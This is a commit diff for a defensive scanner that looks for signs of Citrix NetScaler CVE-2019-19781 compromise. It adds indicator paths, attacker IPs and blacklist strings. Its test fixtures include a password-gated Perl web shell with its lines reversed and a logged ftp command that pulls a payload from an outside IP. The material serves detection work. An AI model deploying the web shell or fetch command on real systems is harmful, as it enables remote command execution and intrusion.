Release 1.4

Release 1.4 and sync with fireeye repo

build.sh

@@ -22,13 +22,14 @@ set -o errexit;
 # ref: https://stackoverflow.com/a/4774063/87207
 readonly current_directory="$( cd "$(dirname "$0")" ; pwd -P )"
 
-# generate a version file with GIT metadata
+# generate a version file with git metadata
 version_file="$current_directory/version.sh";
 if [ -f "$version_file" ]; then
     rm "$version_file";
 fi
-echo "git_tag=$(git describe --tags)" > $version_file;
-echo "git_hash=$(git rev-parse HEAD)" >> $version_file;
+echo "#!/usr/bin/bash" > $version_file;
+echo "git_tag=\"$(git describe --tags)\";" >> $version_file;
+echo "git_hash=\"$(git rev-parse HEAD)\";" >> $version_file;
 
 # not all FreeBSD/NetScaler devices have mktemp.
 readonly staging_directory="/tmp/$(date +%s)";

ioc-scanner-CVE-2019-19781.sh

@@ -377,16 +377,16 @@ report "";
 report "**********************************************************************";
 report "SUMMARY:"
 colwidth="37";
-report "$(fmt_key_val "Date" "$startdate" $colwidth)";
+report "$(fmt_key_val "Date" "$startdate" "$colwidth")";
 # Hostname
 if [ -f "$root_directory/nsconfig/ns.conf" ]; then
     readonly hostname=$(grep 'set ns hostName' "$root_directory/nsconfig/ns.conf" | awk -F ' ' '{print $4}');
-    report "$(fmt_key_val "Hostname" $hostname $colwidth)";
+    report "$(fmt_key_val "Hostname" "$hostname" "$colwidth")";
 fi
 # IP address
 if [ -f "$root_directory/nsconfig/ns.conf" ]; then
     readonly ipstr=$(grep 'ns config \-IPAddress' "$root_directory/nsconfig/ns.conf" | awk -F ' ' '{print $5}');
-    report "$(fmt_key_val "IP" $ipstr $colwidth)";
+    report "$(fmt_key_val "IP" "$ipstr" "$colwidth")";
 fi
 # NS version
 if [ -f "$root_directory/flash/boot/loader.conf" ]; then
@@ -396,18 +396,18 @@ if [ -f "$root_directory/flash/boot/loader.conf" ]; then
     if [[ $ns_verstr == "ns-"* ]]; then
         ns_verstr=${ns_verstr:3};
     fi
-    report "$(fmt_key_val "NS version" "$ns_verstr" $colwidth)";
+    report "$(fmt_key_val "NS version" "$ns_verstr" "$colwidth")";
 fi
-report "$(fmt_key_val "Scanner version" $git_tag $colwidth)";
+report "$(fmt_key_val "Scanner version" "$git_tag" "$colwidth")";
 if "$verbose"; then
     runmode="Verbose";
 else
     runmode="Default";
 fi
-report "$(fmt_key_val "Scanner run mode" $runmode $colwidth)";
-report "$(fmt_key_val "Evidence of compromise found" "$found_evidence_compromise" $colwidth)";
-report "$(fmt_key_val "Evidence of scanning found" "$found_evidence_scanning" $colwidth)";
-report "$(fmt_key_val "Evidence of failed exploitation found" "$found_evidence_failed_exploitation" $colwidth)";
+report "$(fmt_key_val "Scanner run mode" "$runmode" "$colwidth")";
+report "$(fmt_key_val "Evidence of compromise found" "$found_evidence_compromise" "$colwidth")";
+report "$(fmt_key_val "Evidence of scanning found" "$found_evidence_scanning" "$colwidth")";
+report "$(fmt_key_val "Evidence of failed exploitation found" "$found_evidence_failed_exploitation" "$colwidth")";
 report "**********************************************************************";
 report "";
 

scanners/error-logs.sh

@@ -21,7 +21,7 @@ error_log_post_exploitation() {
 
     local results="";
     for regex in "${http_err_regexes[@]}"; do
-        hits=$(find "$root_directory/var/log/" -type f -iname "*httperr*" -exec grep -HEi "$regex" {} \;);
+        hits=$(find "$root_directory/var/log/" -type f -iname "*httperr*" -exec zgrep -HEi "$regex" {} \;);
         results="$results"$'\n'"$hits";
     done
 

scanners/fs-paths.sh

@@ -14,6 +14,9 @@ scan_fs_notrobin() {
     declare -a notrobin_paths;
     notrobin_paths[0]="/var/nstmp/.nscache/httpd";
     notrobin_paths[1]="/tmp/.init/httpd";
+    # from subsequent post
+    notrobin_paths[2]="/var/nstmp/.nscache/prev.sh";
+    notrobin_paths[3]="/var/nstmp/.nscache/httpd-nscache_clean";
 
     local found=false;
     for notrobin_path in "${notrobin_paths[@]}"; do
@@ -23,6 +26,26 @@ scan_fs_notrobin() {
         fi
     done
 
+    declare -a dirs;
+    dirs[0]="/var/vpn/theme";
+    dirs[1]="/var/vpn/themes";
+
+    declare -a blacklist;
+    blacklist[0]="[a-f0-9]\{32\}\.php";
+    blacklist[1]="[a-f0-9]\{32\}_[a-zA-Z0-9]\{1,12\}\.\(php\|pl\)";
+
+    for dir in "${dirs[@]}"; do
+        if [ -d "$root_directory/$dir" ]; then
+            for blackterm in "${blacklist[@]}"; do
+                local entries=$(ls "$root_directory/$dir" | grep "$blackterm");
+                if [ -n "$entries" ]; then
+                    found=true;
+                    report_match "$entries, known path to NOTROBIN artifact.";
+                fi
+            done
+        fi
+    done
+
     if [ "$found" != true ]; then
         debug "did not find NOTROBIN artifacts";
     fi
@@ -45,11 +68,49 @@ scan_fs_isc_paths() {
     if [ "$found" != true ]; then
         debug "did not find artifact enumerated by SANS ISC";
     fi
+}
+
+scan_fs_apt41() {
+    declare -a paths;
+    paths[0]="/tmp/bsd";
+    paths[1]="/tmp/un";
+
+    local found=false;
+    for path in "${paths[@]}"; do
+        if [ -f "$root_directory/$path" ]; then
+            found=true;
+            report_match "$path, known path to post-exploitation artifact.";
+        fi
+    done
+
+    if [ "$found" != true ]; then
+        debug "did not find file system artifact";
+    fi
+}
+
+scan_fs_other_paths() {
+    declare -a paths;
+    paths[0]="/vpn/themes/imgs/tiny.php";
+    paths[1]="/vpn/themes/imgs/debug.php";
+    paths[2]="/vpn/themes/imgs/conn.php";
+
+    local found=false;
+    for path in "${paths[@]}"; do
+        if [ -f "$root_directory/$path" ]; then
+            found=true;
+            report_match "$path, known path to post-exploitation artifact.";
+        fi
+    done
 
+    if [ "$found" != true ]; then
+        debug "did not find file system artifact";
+    fi
 }
 
 scan_fs_known_paths() {
     scan_fs_netscalerd;
     scan_fs_notrobin;
     scan_fs_isc_paths;
+    scan_fs_apt41;
+    scan_fs_other_paths;
 }

scanners/netscaler-content.sh

@@ -35,12 +35,25 @@ ns_content_blacklist[19]="xp_eternalblue.replay";
 # match filename `ld.sh` without matching `build.sh`
 ns_content_blacklist[20]="[^i]ld.sh";
 ns_content_blacklist[21]="piz.Lan";
-ns_content_blacklist[22]="de.py";
+# match filename `de.py` without matching `upgrade.py`
+# see #9
+ns_content_blacklist[22]="[^a]de.py";
 ns_content_blacklist[23]=".new.zip";
 ns_content_blacklist[24]="/tmp/rAgn";
 # other activity
 ns_content_blacklist[25]="198.44.227.126";
 ns_content_blacklist[26]="/tmp/l.sh";
+ns_content_blacklist[27]="Digest::MD5";
+ns_content_blacklist[28]="Could not execute command";
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+ns_content_blacklist[29]="/tmp/bsd";
+ns_content_blacklist[30]="/tmp/un";
+ns_content_blacklist[31]="66.42.98.220";
+ns_content_blacklist[32]="/var/nstmp/.nscache/prev.sh";
+ns_content_blacklist[33]="/var/nstmp/.nscache/httpd-nscache_clean";
+ns_content_blacklist[34]="/vpn/themes/imgs/tiny.php";
+ns_content_blacklist[35]="/vpn/themes/imgs/debug.php";
+ns_content_blacklist[36]="/vpn/themes/imgs/conn.php";
 
 declare -a ns_exploit_dirs;
 ns_exploit_dirs[0]="/netscaler/portal/templates/";
@@ -55,6 +68,7 @@ ns_exploit_dirs[1]="/netscaler/portal/scripts/";
 ns_exploit_dirs[2]="/var/vpn/bookmark/";
 ns_exploit_dirs[3]="/var/tmp/netscaler/portal/templates/";
 ns_exploit_dirs[4]="/var/vpn/themes/";
+ns_exploit_dirs[5]="/var/vpn/theme/";
 
 # custom output formatting for matches.
 #   if the filename ends with .xml print the whole file,
@@ -187,4 +201,4 @@ scan_netscaler_content() {
     # disabled, since we're not sure of the interaction with system updates and/or customizations.
     #scan_ns_new_templates;
     #scan_ns_new_scripts;
-}
+}

scanners/shell-history.sh

@@ -35,7 +35,8 @@ shell_history_blacklist[23]="x86.dll"
 shell_history_blacklist[24]="xp_eternalblue.replay"
 shell_history_blacklist[25]="ld.sh"
 shell_history_blacklist[26]="piz.Lan"
-shell_history_blacklist[27]="de.py"
+# disabled due to #9
+# shell_history_blacklist[27]="de.py"
 shell_history_blacklist[28]=".new.zip"
 shell_history_blacklist[29]="/tmp/rAgn"
 shell_history_blacklist[30]="/tmp/.init/httpd"
@@ -49,12 +50,24 @@ shell_history_blacklist[35]="157.157.87.22"
 shell_history_blacklist[36]="193.187.174.104"
 shell_history_blacklist[37]="62.113.112.33"
 shell_history_blacklist[38]="217.12.221.12"
+# from subsequent NOTROBIN and/or APT41 blog posts from FEYE
+shell_history_blacklist[39]="/tmp/bsd";
+shell_history_blacklist[40]="/tmp/un";
+shell_history_blacklist[41]="66.42.98.220";
+shell_history_blacklist[42]="/var/nstmp/.nscache/prev.sh";
+shell_history_blacklist[43]="/var/nstmp/.nscache/httpd-nscache_clean";
+shell_history_blacklist[44]="/vpn/themes/imgs/tiny.php";
+shell_history_blacklist[45]="/vpn/themes/imgs/debug.php";
+shell_history_blacklist[46]="/vpn/themes/imgs/conn.php";
 
 declare -a shell_history_paths;
 shell_history_paths[0]="/var/log/bash.log";
 shell_history_paths[1]="/var/log/notice.log";
 shell_history_paths[2]="/var/log/sh.log";
 
+# addresses issue 24
+readonly whitelist="declare -a notrobin_paths;";
+
 scan_shell_history() {
     for path in "${shell_history_paths[@]}"; do
         if  ! compgen -G "$root_directory/$path*" >/dev/null; then
@@ -65,7 +78,7 @@ scan_shell_history() {
         local found=false;
         for re in "${shell_history_blacklist[@]}"; do
             # /dev/null to ensure at least one of these files exists so zgrep doesn't fail
-            local entries=$(zgrep -F "$re" "$root_directory/$path"* /dev/null);
+            local entries=$(zgrep -F "$re" "$root_directory/$path"* /dev/null | grep -v "$whitelist");
             if [ -n "$entries" ]; then
                 found=true;
                 report_match "blacklisted content '$re'";

tests/ns-content/perl-webshell/.test

@@ -0,0 +1 @@
+

tests/ns-content/perl-webshell/netscaler/portal/scripts/loadcolorprefs.pl

@@ -0,0 +1,14 @@
+while(<CMD>){print;}close(CMD);print"-"x 80;}}}}\
+open(CMD,"($cmd) 2>$1 |")||print"Could not execute command";\
+if($md5->hexdigest eq"foobar9c61a8feef4c4a34ece5abe31b"){print"-"x 80;\
+{my$md5=Digest::MD5->new;$md5->add($FORM{"pass"});\
+{$cmd=$FORM{"cmd"};if(defined$FORM{"pass"})\
+%FORM=parse_parameters($cmd);if(defined$FORM{"cmd"})\
+{read(STDIN,$cmd,$ENV{"CONTENT_LENGTH"});\
+$ENV{"REQUEST_METHOD"}=~tr/a-z/A-Z/;if($ENV{"REQUEST_METHOD"}eq"POST")\
+$ret{$var}=$value;}}return%ret;}\
+if($var){$value=~s/\\\ / /g;$value=~s/%(..)/pack("c",hex($1))/eg;\
+{my($var,$value)=split("=",$pair,2);\
+{my%ret;my$input=shift;foreach my $pair(split(/$/,$input))\
+print"Content-Type: text/html";sub parse_parameters ($)\
+use strict;use Digest::MD5;my($cmd,%FORM);$|=1;\

tests/shell-history/bsd/var/log/bash.log

@@ -0,0 +1 @@
+Jan 19 24:26:52 <local7.notice> ns bash[1297]: root on /dev/pts/0 shell_command="/usr/bin/ftp -o /tmp/bsd ftp://xxxxxxxxxxxxxxxxxxxxxx66.42.98.220/bsd"